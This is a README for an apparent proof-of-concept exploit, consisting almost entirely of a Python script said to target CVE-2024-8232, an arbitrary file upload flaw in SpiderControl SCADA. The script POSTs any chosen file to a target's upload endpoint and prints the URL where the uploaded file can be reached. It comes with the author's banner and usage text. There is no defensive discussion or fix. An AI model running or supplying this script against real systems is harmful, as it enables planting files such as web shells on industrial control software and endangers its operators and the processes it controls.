README.md
Rendering markdown...
---
###`poc.py`
```python
import requests
import sys
import os
def banner():
print("\n[+] CVE-2024-8232 – SpiderControl SCADA Arbitrary File Upload")
print("[+] PoC by ZΞUS\n")
def upload_file(target_url, endpoint, filename):
upload_url = f"{target_url.rstrip('/')}/{endpoint.lstrip('/')}"
file_to_upload = open(filename, 'rb')
files = {
'file': (os.path.basename(filename), file_to_upload, 'application/octet-stream')
}
print(f"[+] Uploading {filename} to {upload_url}")
try:
response = requests.post(upload_url, files=files, timeout=10)
if response.status_code == 200:
print("[+] File uploaded successfully!")
print(f"[+] Access it at: {target_url.rstrip('/')}/{os.path.basename(filename)}")
else:
print("[-] Upload failed. Status code:", response.status_code)
except Exception as e:
print("[-] Error:", e)
file_to_upload.close()
if __name__ == "__main__":
banner()
if len(sys.argv) != 4:
print("Usage: python3 poc.py <target_url> <upload_endpoint> <file_to_upload>")
sys.exit(1)
target, endpoint, filename = sys.argv[1], sys.argv[2], sys.argv[3]
upload_file(target, endpoint, filename)